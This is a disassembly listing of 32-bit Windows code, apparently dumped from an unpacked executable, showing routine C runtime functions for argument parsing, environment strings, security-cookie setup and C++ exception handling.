		call	sub_4046F0
		mov	ebp, eax
		inc	ebp
		cmp	byte ptr [esi],	3Dh
		pop	ecx
		jz	short loc_40B23B
		push	1
		push	ebp
		call	sub_407D3A
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		mov	[edi], eax
		jz	short loc_40B266
		push	esi
		push	ebp
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40B238
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40B238:				; CODE XREF: sub_40B1A1+88j
		add	edi, 4

loc_40B23B:				; CODE XREF: sub_40B1A1+69j
		add	esi, ebp

loc_40B23D:				; CODE XREF: sub_40B1A1+5Aj
		cmp	[esi], bl
		jnz	short loc_40B1FD
		push	dword_427DF4
		call	sub_403B91
		mov	dword_427DF4, ebx
		mov	[edi], ebx
		mov	dword_438828, 1
		xor	eax, eax

loc_40B260:				; CODE XREF: sub_40B1A1+D9j
		pop	ecx
		pop	ebp

loc_40B262:				; CODE XREF: sub_40B1A1+21j
		pop	edi
		pop	esi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_40B266:				; CODE XREF: sub_40B1A1+79j
		push	dword_4282F8
		call	sub_403B91
		mov	dword_4282F8, ebx
		or	eax, 0FFFFFFFFh
		jmp	short loc_40B260
sub_40B1A1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B27C	proc near		; CODE XREF: sub_40B414+55p
					; sub_40B414+96p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	ecx, [ebp+arg_8]
		push	ebx
		xor	eax, eax
		cmp	[ebp+arg_0], eax
		push	esi
		mov	[edi], eax
		mov	esi, edx
		mov	edx, [ebp+arg_4]
		mov	dword ptr [ecx], 1
		jz	short loc_40B2A2
		mov	ebx, [ebp+arg_0]
		add	[ebp+arg_0], 4
		mov	[ebx], edx

loc_40B2A2:				; CODE XREF: sub_40B27C+1Bj
		mov	[ebp+var_4], eax

loc_40B2A5:				; CODE XREF: sub_40B27C+7Ej
					; sub_40B27C+88j
		cmp	byte ptr [esi],	22h
		jnz	short loc_40B2BA
		xor	eax, eax
		cmp	[ebp+var_4], eax
		mov	bl, 22h
		setz	al
		inc	esi
		mov	[ebp+var_4], eax
		jmp	short loc_40B2F6
; ---------------------------------------------------------------------------

loc_40B2BA:				; CODE XREF: sub_40B27C+2Cj
		inc	dword ptr [edi]
		test	edx, edx
		jz	short loc_40B2C8
		mov	al, [esi]
		mov	[edx], al
		inc	edx
		mov	[ebp+arg_4], edx

loc_40B2C8:				; CODE XREF: sub_40B27C+42j
		mov	bl, [esi]
		movzx	eax, bl
		push	eax
		inc	esi
		call	sub_41075D
		test	eax, eax
		pop	ecx
		jz	short loc_40B2EC
		inc	dword ptr [edi]
		cmp	[ebp+arg_4], 0
		jz	short loc_40B2EB
		mov	ecx, [ebp+arg_4]
		mov	al, [esi]
		inc	[ebp+arg_4]
		mov	[ecx], al

loc_40B2EB:				; CODE XREF: sub_40B27C+63j
		inc	esi

loc_40B2EC:				; CODE XREF: sub_40B27C+5Bj
		test	bl, bl
		mov	edx, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		jz	short loc_40B328

loc_40B2F6:				; CODE XREF: sub_40B27C+3Cj
		cmp	[ebp+var_4], 0
		jnz	short loc_40B2A5
		cmp	bl, 20h
		jz	short loc_40B306
		cmp	bl, 9
		jnz	short loc_40B2A5

loc_40B306:				; CODE XREF: sub_40B27C+83j
		test	edx, edx
		jz	short loc_40B30E
		mov	byte ptr [edx-1], 0

loc_40B30E:				; CODE XREF: sub_40B27C+8Cj
					; sub_40B27C+ADj
		and	[ebp+var_4], 0

loc_40B312:				; CODE XREF: sub_40B27C+183j
		cmp	byte ptr [esi],	0
		jz	loc_40B404

loc_40B31B:				; CODE XREF: sub_40B27C+AAj
		mov	al, [esi]
		cmp	al, 20h
		jz	short loc_40B325
		cmp	al, 9
		jnz	short loc_40B32B

loc_40B325:				; CODE XREF: sub_40B27C+A3j
		inc	esi
		jmp	short loc_40B31B
; ---------------------------------------------------------------------------

loc_40B328:				; CODE XREF: sub_40B27C+78j
		dec	esi
		jmp	short loc_40B30E
; ---------------------------------------------------------------------------

loc_40B32B:				; CODE XREF: sub_40B27C+A7j
		cmp	byte ptr [esi],	0
		jz	loc_40B404
		cmp	[ebp+arg_0], 0
		jz	short loc_40B343
		mov	eax, [ebp+arg_0]
		add	[ebp+arg_0], 4
		mov	[eax], edx

loc_40B343:				; CODE XREF: sub_40B27C+BCj
		inc	dword ptr [ecx]

loc_40B345:				; CODE XREF: sub_40B27C+16Ej
		xor	ebx, ebx
		inc	ebx
		xor	ecx, ecx
		jmp	short loc_40B34E
; ---------------------------------------------------------------------------

loc_40B34C:				; CODE XREF: sub_40B27C+D5j
		inc	esi
		inc	ecx

loc_40B34E:				; CODE XREF: sub_40B27C+CEj
		cmp	byte ptr [esi],	5Ch
		jz	short loc_40B34C
		cmp	byte ptr [esi],	22h
		jnz	short loc_40B37E
		test	cl, 1
		jnz	short loc_40B37C
		cmp	[ebp+var_4], 0
		jz	short loc_40B36F
		lea	eax, [esi+1]
		cmp	byte ptr [eax],	22h
		jnz	short loc_40B36F
		mov	esi, eax
		jmp	short loc_40B37C
; ---------------------------------------------------------------------------

loc_40B36F:				; CODE XREF: sub_40B27C+E5j
					; sub_40B27C+EDj
		xor	eax, eax
		xor	ebx, ebx
		cmp	[ebp+var_4], eax
		setz	al
		mov	[ebp+var_4], eax

loc_40B37C:				; CODE XREF: sub_40B27C+DFj
					; sub_40B27C+F1j
		shr	ecx, 1

loc_40B37E:				; CODE XREF: sub_40B27C+DAj
		test	ecx, ecx
		jz	short loc_40B394

loc_40B382:				; CODE XREF: sub_40B27C+113j
		dec	ecx
		test	edx, edx
		jz	short loc_40B38B
		mov	byte ptr [edx],	5Ch
		inc	edx

loc_40B38B:				; CODE XREF: sub_40B27C+109j
		inc	dword ptr [edi]
		test	ecx, ecx
		jnz	short loc_40B382
		mov	[ebp+arg_4], edx

loc_40B394:				; CODE XREF: sub_40B27C+104j
		mov	al, [esi]
		test	al, al
		jz	short loc_40B3EF
		cmp	[ebp+var_4], 0
		jnz	short loc_40B3A8
		cmp	al, 20h
		jz	short loc_40B3EF
		cmp	al, 9
		jz	short loc_40B3EF

loc_40B3A8:				; CODE XREF: sub_40B27C+122j
		test	ebx, ebx
		jz	short loc_40B3E9
		test	edx, edx
		movsx	eax, al
		push	eax
		jz	short loc_40B3D7
		call	sub_41075D
		test	eax, eax
		pop	ecx
		jz	short loc_40B3CB
		mov	al, [esi]
		mov	ecx, [ebp+arg_4]
		inc	[ebp+arg_4]
		mov	[ecx], al
		inc	esi
		inc	dword ptr [edi]

loc_40B3CB:				; CODE XREF: sub_40B27C+140j
		mov	ecx, [ebp+arg_4]
		mov	al, [esi]
		inc	[ebp+arg_4]
		mov	[ecx], al
		jmp	short loc_40B3E4
; ---------------------------------------------------------------------------

loc_40B3D7:				; CODE XREF: sub_40B27C+136j
		call	sub_41075D
		test	eax, eax
		pop	ecx
		jz	short loc_40B3E4
		inc	esi
		inc	dword ptr [edi]

loc_40B3E4:				; CODE XREF: sub_40B27C+159j
					; sub_40B27C+163j
		inc	dword ptr [edi]
		mov	edx, [ebp+arg_4]

loc_40B3E9:				; CODE XREF: sub_40B27C+12Ej
		inc	esi
		jmp	loc_40B345
; ---------------------------------------------------------------------------

loc_40B3EF:				; CODE XREF: sub_40B27C+11Cj
					; sub_40B27C+126j ...
		test	edx, edx
		jz	short loc_40B3FA
		mov	byte ptr [edx],	0
		inc	edx
		mov	[ebp+arg_4], edx

loc_40B3FA:				; CODE XREF: sub_40B27C+175j
		inc	dword ptr [edi]
		mov	ecx, [ebp+arg_8]
		jmp	loc_40B312
; ---------------------------------------------------------------------------

loc_40B404:				; CODE XREF: sub_40B27C+99j
					; sub_40B27C+B2j
		mov	eax, [ebp+arg_0]
		test	eax, eax
		pop	esi
		pop	ebx
		jz	short loc_40B410
		and	dword ptr [eax], 0

loc_40B410:				; CODE XREF: sub_40B27C+18Fj
		inc	dword ptr [ecx]
		leave
		retn
sub_40B27C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B414	proc near		; CODE XREF: .text:00404624p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		push	ebx
		xor	ebx, ebx
		cmp	dword_438834, ebx
		push	esi
		push	edi
		jnz	short loc_40B42C
		call	sub_4053C3

loc_40B42C:				; CODE XREF: sub_40B414+11j
		push	104h
		mov	esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
		push	esi
		push	ebx
		mov	byte_42875C, bl
		call	ds:dword_41E060	; GetModuleFileNameA
		mov	eax, dword_438858
		cmp	eax, ebx
		mov	off_428308, esi
		jz	short loc_40B45A
		cmp	[eax], bl
		mov	[ebp+var_4], eax
		jnz	short loc_40B45D

loc_40B45A:				; CODE XREF: sub_40B414+3Dj
		mov	[ebp+var_4], esi

loc_40B45D:				; CODE XREF: sub_40B414+44j
		mov	edx, [ebp+var_4]
		lea	eax, [ebp+var_8]
		push	eax
		push	ebx
		push	ebx
		lea	edi, [ebp+var_C]
		call	sub_40B27C
		mov	eax, [ebp+var_8]
		add	esp, 0Ch
		cmp	eax, 3FFFFFFFh
		jnb	short loc_40B4C5
		mov	ecx, [ebp+var_C]
		cmp	ecx, 0FFFFFFFFh
		jnb	short loc_40B4C5
		mov	edi, eax
		shl	edi, 2
		lea	eax, [edi+ecx]
		cmp	eax, ecx
		jb	short loc_40B4C5
		push	eax
		call	sub_407CFA
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		jz	short loc_40B4C5
		mov	edx, [ebp+var_4]
		lea	eax, [ebp+var_8]
		push	eax
		add	edi, esi
		push	edi
		push	esi
		lea	edi, [ebp+var_C]
		call	sub_40B27C
		mov	eax, [ebp+var_8]
		add	esp, 0Ch
		dec	eax
		mov	dword_4282EC, eax
		mov	dword_4282F0, esi
		xor	eax, eax
		jmp	short loc_40B4C8
; ---------------------------------------------------------------------------

loc_40B4C5:				; CODE XREF: sub_40B414+65j
					; sub_40B414+6Dj ...
		or	eax, 0FFFFFFFFh

loc_40B4C8:				; CODE XREF: sub_40B414+AFj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40B414	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B4CD	proc near		; CODE XREF: .text:0040461Ap

var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ecx
		push	ecx
		mov	eax, dword_428760
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, ds:dword_41E130
		xor	ebx, ebx
		xor	esi, esi
		cmp	eax, ebx
		push	2
		pop	ebp
		jnz	short loc_40B516
		call	edi	; GetEnvironmentStringsW
		mov	esi, eax
		cmp	esi, ebx
		jz	short loc_40B4FD
		mov	dword_428760, 1
		jmp	short loc_40B51F
; ---------------------------------------------------------------------------

loc_40B4FD:				; CODE XREF: sub_40B4CD+22j
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40B511
		mov	eax, ebp
		mov	dword_428760, eax
		jmp	short loc_40B516
; ---------------------------------------------------------------------------

loc_40B511:				; CODE XREF: sub_40B4CD+39j
		mov	eax, dword_428760

loc_40B516:				; CODE XREF: sub_40B4CD+1Aj
					; sub_40B4CD+42j
		cmp	eax, 1
		jnz	loc_40B5A3

loc_40B51F:				; CODE XREF: sub_40B4CD+2Ej
		cmp	esi, ebx
		jnz	short loc_40B532
		call	edi	; GetEnvironmentStringsW
		mov	esi, eax
		cmp	esi, ebx
		jnz	short loc_40B532

loc_40B52B:				; CODE XREF: sub_40B4CD+DCj
					; sub_40B4CD+E8j ...
		xor	eax, eax
		jmp	loc_40B5FB
; ---------------------------------------------------------------------------

loc_40B532:				; CODE XREF: sub_40B4CD+54j
					; sub_40B4CD+5Cj
		cmp	[esi], bx
		mov	eax, esi
		jz	short loc_40B547

loc_40B539:				; CODE XREF: sub_40B4CD+71j
					; sub_40B4CD+78j
		add	eax, ebp
		cmp	[eax], bx
		jnz	short loc_40B539
		add	eax, ebp
		cmp	[eax], bx
		jnz	short loc_40B539

loc_40B547:				; CODE XREF: sub_40B4CD+6Aj
		mov	edi, ds:dword_41E134
		push	ebx
		push	ebx
		push	ebx
		sub	eax, esi
		push	ebx
		sar	eax, 1
		inc	eax
		push	eax
		push	esi
		push	ebx
		push	ebx
		mov	[esp+38h+var_4], eax
		call	edi	; WideCharToMultiByte
		mov	ebp, eax
		cmp	ebp, ebx
		jz	short loc_40B598
		push	ebp
		call	sub_407CFA
		cmp	eax, ebx
		pop	ecx
		mov	[esp+18h+var_8], eax
		jz	short loc_40B598
		push	ebx
		push	ebx
		push	ebp
		push	eax
		push	[esp+28h+var_4]
		push	esi
		push	ebx
		push	ebx
		call	edi	; WideCharToMultiByte
		test	eax, eax
		jnz	short loc_40B594
		push	[esp+18h+var_8]
		call	sub_403B91
		pop	ecx
		mov	[esp+18h+var_8], ebx

loc_40B594:				; CODE XREF: sub_40B4CD+B7j
		mov	ebx, [esp+18h+var_8]

loc_40B598:				; CODE XREF: sub_40B4CD+97j
					; sub_40B4CD+A6j
		push	esi
		call	ds:dword_41E138	; FreeEnvironmentStringsW
		mov	eax, ebx
		jmp	short loc_40B5FB
; ---------------------------------------------------------------------------

loc_40B5A3:				; CODE XREF: sub_40B4CD+4Cj
		cmp	eax, ebp
		jz	short loc_40B5AB
		cmp	eax, ebx
		jnz	short loc_40B52B

loc_40B5AB:				; CODE XREF: sub_40B4CD+D8j
		call	ds:off_41E13C
		mov	esi, eax
		cmp	esi, ebx
		jz	loc_40B52B
		cmp	[esi], bl
		jz	short loc_40B5C9

loc_40B5BF:				; CODE XREF: sub_40B4CD+F5j
					; sub_40B4CD+FAj
		inc	eax
		cmp	[eax], bl
		jnz	short loc_40B5BF
		inc	eax
		cmp	[eax], bl
		jnz	short loc_40B5BF

loc_40B5C9:				; CODE XREF: sub_40B4CD+F0j
		sub	eax, esi
		inc	eax
		mov	ebp, eax
		push	ebp
		call	sub_407CFA
		mov	edi, eax
		cmp	edi, ebx
		pop	ecx
		jnz	short loc_40B5E7
		push	esi
		call	ds:off_41E140
		jmp	loc_40B52B
; ---------------------------------------------------------------------------

loc_40B5E7:				; CODE XREF: sub_40B4CD+10Cj
		push	ebp
		push	esi
		push	edi
		call	sub_4081B0
		add	esp, 0Ch
		push	esi
		call	ds:off_41E140
		mov	eax, edi

loc_40B5FB:				; CODE XREF: sub_40B4CD+60j
					; sub_40B4CD+D4j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		pop	ecx
		retn
sub_40B4CD	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B602	proc near		; CODE XREF: .text:loc_4045F6p
		push	esi
		push	edi
		mov	eax, offset dword_422800
		mov	edi, offset dword_422800
		cmp	eax, edi
		mov	esi, eax
		jnb	short loc_40B623

loc_40B614:				; CODE XREF: sub_40B602+1Fj
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40B61C
		call	eax

loc_40B61C:				; CODE XREF: sub_40B602+16j
		add	esi, 4
		cmp	esi, edi
		jb	short loc_40B614

loc_40B623:				; CODE XREF: sub_40B602+10j
		pop	edi
		pop	esi
		retn
sub_40B602	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B626	proc near		; DATA XREF: sub_407F39+3Fo
		push	esi
		push	edi
		mov	eax, offset dword_422808
		mov	edi, offset dword_422808
		cmp	eax, edi
		mov	esi, eax
		jnb	short loc_40B647

loc_40B638:				; CODE XREF: sub_40B626+1Fj
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40B640
		call	eax

loc_40B640:				; CODE XREF: sub_40B626+16j
		add	esi, 4
		cmp	esi, edi
		jb	short loc_40B638

loc_40B647:				; CODE XREF: sub_40B626+10j
		pop	edi
		pop	esi
		retn
sub_40B626	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B64A	proc near		; CODE XREF: .text:loc_4046E2p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_424064
		and	[ebp+var_8], 0
		and	[ebp+var_4], 0
		push	ebx
		push	edi
		mov	edi, 0BB40E64Eh
		cmp	eax, edi
		mov	ebx, 0FFFF0000h
		jz	short loc_40B67A
		test	eax, ebx
		jz	short loc_40B67A
		not	eax
		mov	dword_424068, eax
		jmp	short loc_40B6DA
; ---------------------------------------------------------------------------

loc_40B67A:				; CODE XREF: sub_40B64A+21j
					; sub_40B64A+25j
		push	esi
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41E1A0
		mov	esi, [ebp+var_4]
		xor	esi, [ebp+var_8]
		call	ds:dword_41E194	; GetCurrentProcessId
		xor	esi, eax
		call	ds:dword_41E0DC	; GetCurrentThreadId
		xor	esi, eax
		call	ds:dword_41E104	; GetTickCount
		xor	esi, eax
		lea	eax, [ebp+var_10]
		push	eax
		call	ds:dword_41E058	; QueryPerformanceCounter
		mov	eax, [ebp+var_C]
		xor	eax, [ebp+var_10]
		xor	esi, eax
		cmp	esi, edi
		jnz	short loc_40B6C0
		mov	esi, 0BB40E64Fh
		jmp	short loc_40B6CB
; ---------------------------------------------------------------------------

loc_40B6C0:				; CODE XREF: sub_40B64A+6Dj
		test	esi, ebx
		jnz	short loc_40B6CB
		mov	eax, esi
		shl	eax, 10h
		or	esi, eax

loc_40B6CB:				; CODE XREF: sub_40B64A+74j
					; sub_40B64A+78j
		mov	dword_424064, esi
		not	esi
		mov	dword_424068, esi
		pop	esi

loc_40B6DA:				; CODE XREF: sub_40B64A+2Ej
		pop	edi
		pop	ebx
		leave
		retn
sub_40B64A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B6DE	proc near		; DATA XREF: sub_40B74Ao
					; .data:00424060o ...

arg_0		= dword	ptr  4

		push	edi
		mov	edi, [esp+4+arg_0]
		mov	eax, [edi]
		cmp	dword ptr [eax], 0E06D7363h
		jnz	short loc_40B717
		cmp	dword ptr [eax+10h], 3
		jnz	short loc_40B717
		mov	eax, [eax+14h]
		cmp	eax, 19930520h
		jz	short loc_40B712
		cmp	eax, 19930521h
		jz	short loc_40B712
		cmp	eax, 19930522h
		jz	short loc_40B712
		cmp	eax, 1994000h
		jnz	short loc_40B717

loc_40B712:				; CODE XREF: sub_40B6DE+1Dj
					; sub_40B6DE+24j ...
		call	sub_40C419

loc_40B717:				; CODE XREF: sub_40B6DE+Dj
					; sub_40B6DE+13j ...
		cmp	byte_428768, 0
		push	esi
		jz	short loc_40B743
		push	dword_428764
		call	sub_405753
		mov	esi, eax
		test	esi, esi
		pop	ecx
		jz	short loc_40B743
		push	esi
		call	sub_410770
		test	eax, eax
		pop	ecx
		jz	short loc_40B743
		push	edi
		call	esi
		jmp	short loc_40B745
; ---------------------------------------------------------------------------

loc_40B743:				; CODE XREF: sub_40B6DE+41j
					; sub_40B6DE+53j ...
		xor	eax, eax

loc_40B745:				; CODE XREF: sub_40B6DE+63j
		pop	esi
		pop	edi
		retn	4
sub_40B6DE	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B74A	proc near		; DATA XREF: jlrllt49:0041E2F4o
		push	offset sub_40B6DE
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		push	eax
		call	sub_4056E7
		mov	dword_428764, eax
		pop	ecx
		mov	byte_428768, 1
		xor	eax, eax
		retn
sub_40B74A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B76B	proc near		; DATA XREF: jlrllt49:0041E310o
		cmp	byte_428768, 0
		jz	short locret_40B78E
		push	dword_428764
		call	sub_405753
		pop	ecx
		push	eax
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		mov	byte_428768, 0

locret_40B78E:				; CODE XREF: sub_40B76B+7j
		retn
sub_40B76B	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B78F	proc near		; DATA XREF: jlrllt49:00422C58o
		mov	dword ptr [ecx], offset	off_41EC44
		jmp	sub_403258
sub_40B78F	endp

; ---------------------------------------------------------------------------

loc_40B79A:				; DATA XREF: jlrllt49:off_41EC44o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41EC44
		call	sub_403258
		test	byte ptr [esp+8], 1
		jz	short loc_40B7B6
		push	esi
		call	sub_4034FB
		pop	ecx

loc_40B7B6:				; CODE XREF: .text:0040B7ADj
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_40B7BC	proc near		; CODE XREF: sub_40B9FB+4Ep
					; sub_40BFC7+21Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		push	edi
		mov	edi, [esp+8+arg_0]
		mov	eax, [edi+4]
		test	eax, eax
		jz	short loc_40B812
		lea	edx, [eax+8]
		cmp	byte ptr [edx],	0
		jz	short loc_40B812
		mov	esi, [esp+8+arg_4]
		mov	ecx, [esi+4]
		cmp	eax, ecx
		jz	short loc_40B7F0
		add	ecx, 8
		push	ecx
		push	edx
		call	sub_408590
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40B7F0

loc_40B7EC:				; CODE XREF: sub_40B7BC+3Cj
					; sub_40B7BC+4Bj ...
		xor	eax, eax
		jmp	short loc_40B815
; ---------------------------------------------------------------------------

loc_40B7F0:				; CODE XREF: sub_40B7BC+1Ej
					; sub_40B7BC+2Ej
		test	byte ptr [esi],	2
		jz	short loc_40B7FA
		test	byte ptr [edi],	8
		jz	short loc_40B7EC

loc_40B7FA:				; CODE XREF: sub_40B7BC+37j
		mov	eax, [esp+8+arg_8]
		mov	eax, [eax]
		test	al, 1
		jz	short loc_40B809
		test	byte ptr [edi],	1
		jz	short loc_40B7EC

loc_40B809:				; CODE XREF: sub_40B7BC+46j
		test	al, 2
		jz	short loc_40B812
		test	byte ptr [edi],	2
		jz	short loc_40B7EC

loc_40B812:				; CODE XREF: sub_40B7BC+Bj
					; sub_40B7BC+13j ...
		xor	eax, eax
		inc	eax

loc_40B815:				; CODE XREF: sub_40B7BC+32j
		pop	edi
		pop	esi
		retn
sub_40B7BC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B818	proc near		; CODE XREF: sub_40B85C+85p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0E0434F4Dh
		jz	short loc_40B83F
		cmp	eax, 0E06D7363h
		jnz	short loc_40B859
		call	sub_40595D
		and	dword ptr [eax+90h], 0
		jmp	sub_40C419
; ---------------------------------------------------------------------------

loc_40B83F:				; CODE XREF: sub_40B818+Dj
		call	sub_40595D
		cmp	dword ptr [eax+90h], 0
		jle	short loc_40B859
		call	sub_40595D
		add	eax, 90h
		dec	dword ptr [eax]

loc_40B859:				; CODE XREF: sub_40B818+14j
					; sub_40B818+33j
		xor	eax, eax
		retn
sub_40B818	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B85C	proc near		; CODE XREF: sub_40BABD+ECp
					; sub_40BE69+36p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	10h
		push	offset dword_422B50
		call	__SEH_prolog4
		mov	edi, [ebp+arg_8]
		mov	ebx, [ebp+arg_0]
		cmp	dword ptr [edi+4], 80h
		jg	short loc_40B87D
		movsx	esi, byte ptr [ebx+8]
		jmp	short loc_40B880
; ---------------------------------------------------------------------------

loc_40B87D:				; CODE XREF: sub_40B85C+19j
		mov	esi, [ebx+8]

loc_40B880:				; CODE XREF: sub_40B85C+1Fj
		mov	[ebp+var_1C], esi
		call	sub_40595D
		add	eax, 90h
		inc	dword ptr [eax]
		and	[ebp+ms_exc.disabled], 0

loc_40B893:				; CODE XREF: sub_40B85C+9Fj
		cmp	esi, [ebp+arg_C]
		jz	short loc_40B8FD
		cmp	esi, 0FFFFFFFFh
		jle	short loc_40B8A2
		cmp	esi, [edi+4]
		jl	short loc_40B8A7

loc_40B8A2:				; CODE XREF: sub_40B85C+3Fj
		call	sub_40C465

loc_40B8A7:				; CODE XREF: sub_40B85C+44j
		mov	eax, esi
		shl	eax, 3
		mov	ecx, [edi+8]
		add	ecx, eax
		mov	esi, [ecx]
		mov	[ebp+var_20], esi
		mov	[ebp+ms_exc.disabled], 1
		cmp	dword ptr [ecx+4], 0
		jz	short loc_40B8D8
		mov	[ebx+8], esi
		push	103h
		push	ebx
		mov	ecx, [edi+8]
		push	dword ptr [ecx+eax+4]
		call	sub_40C4B0

loc_40B8D8:				; CODE XREF: sub_40B85C+65j
		and	[ebp+ms_exc.disabled], 0
		jmp	short loc_40B8F8
; ---------------------------------------------------------------------------

loc_40B8DE:				; DATA XREF: jlrllt49:00422B70o
		push	[ebp+ms_exc.exc_ptr]
		call	sub_40B818
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40B8E8:				; DATA XREF: jlrllt49:00422B74o
		mov	esp, [ebp+ms_exc.old_esp]
		and	[ebp+ms_exc.disabled], 0
		mov	edi, [ebp+arg_8]
		mov	ebx, [ebp+arg_0]
		mov	esi, [ebp+var_20]

loc_40B8F8:				; CODE XREF: sub_40B85C+80j
		mov	[ebp+var_1C], esi
		jmp	short loc_40B893
; ---------------------------------------------------------------------------

loc_40B8FD:				; CODE XREF: sub_40B85C+3Aj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40B922
		cmp	esi, [ebp+arg_C]
		jz	short loc_40B913
		call	sub_40C465

loc_40B913:				; CODE XREF: sub_40B85C+B0j
		mov	[ebx+8], esi
		call	__SEH_epilog4
		retn
sub_40B85C	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B91C	proc near		; DATA XREF: jlrllt49:00422B68o
		mov	ebx, [ebp+8]
		mov	esi, [ebp-1Ch]
sub_40B91C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40B922	proc near		; CODE XREF: sub_40B85C+A8p
		call	sub_40595D
		cmp	dword ptr [eax+90h], 0
		jle	short locret_40B93C
		call	sub_40595D
		add	eax, 90h
		dec	dword ptr [eax]

locret_40B93C:				; CODE XREF: sub_40B922+Cj
		retn
sub_40B922	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B93D	proc near		; CODE XREF: sub_40BABD+93p
		mov	eax, [eax]
		cmp	dword ptr [eax], 0E06D7363h
		jnz	short loc_40B97F
		cmp	dword ptr [eax+10h], 3
		jnz	short loc_40B97F
		mov	ecx, [eax+14h]
		cmp	ecx, 19930520h
		jz	short loc_40B968
		cmp	ecx, 19930521h
		jz	short loc_40B968
		cmp	ecx, 19930522h
		jnz	short loc_40B97F

loc_40B968:				; CODE XREF: sub_40B93D+19j
					; sub_40B93D+21j
		cmp	dword ptr [eax+1Ch], 0
		jnz	short loc_40B97F
		call	sub_40595D
		xor	ecx, ecx
		inc	ecx
		mov	[eax+20Ch], ecx
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_40B97F:				; CODE XREF: sub_40B93D+8j
					; sub_40B93D+Ej ...
		xor	eax, eax
		retn
sub_40B93D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B982	proc near		; CODE XREF: sub_406C00+112p
					; sub_40BBE3+6Ep ...

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_422B78
		call	__SEH_prolog4
		mov	ecx, [ebp+arg_0]
		test	ecx, ecx
		jz	short loc_40B9BF
		cmp	dword ptr [ecx], 0E06D7363h
		jnz	short loc_40B9BF
		mov	eax, [ecx+1Ch]
		test	eax, eax
		jz	short loc_40B9BF
		mov	eax, [eax+4]
		test	eax, eax
		jz	short loc_40B9BF
		and	[ebp+ms_exc.disabled], 0
		push	eax
		push	dword ptr [ecx+18h]
		call	sub_4047F5
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40B9BF:				; CODE XREF: sub_40B982+11j
					; sub_40B982+19j ...
		call	__SEH_epilog4
		retn
sub_40B982	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		cmp	[ebp+0Ch], al
		setnz	al
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		jmp	sub_40C419

; =============== S U B	R O U T	I N E =======================================



sub_40B9D6	proc near		; CODE XREF: sub_40BC59+86p
					; sub_40BC59+113p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	ecx, [esp+arg_4]
		mov	eax, [ecx]
		push	esi
		mov	esi, [esp+4+arg_0]
		add	eax, esi
		cmp	dword ptr [ecx+4], 0
		jl	short loc_40B9F9
		mov	edx, [ecx+4]
		mov	ecx, [ecx+8]
		mov	esi, [edx+esi]
		mov	ecx, [esi+ecx]
		add	ecx, edx
		add	eax, ecx

loc_40B9F9:				; CODE XREF: sub_40B9D6+11j
		pop	esi
		retn
sub_40B9D6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B9FB	proc near		; CODE XREF: sub_40BFC7+111p
					; sub_40BFC7+2AEp

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_1		= byte ptr -1
arg_0		= dword	ptr  8

		push	ebp
